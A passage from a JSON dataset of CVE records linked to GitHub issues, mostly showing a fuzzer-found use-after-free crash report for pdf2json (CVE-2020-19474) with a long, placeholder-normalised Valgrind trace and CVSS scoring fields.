exception ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19474",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/35",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/35",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-29T15:08:20Z",
        "description": "SEGV (use after free) on APITAG Hi, Our fuzzer found a crash due to an Use After Free bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG BD5: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG FB: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b0e0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b0e8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CA4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG C8: memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete ](void ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afac is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CA4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by 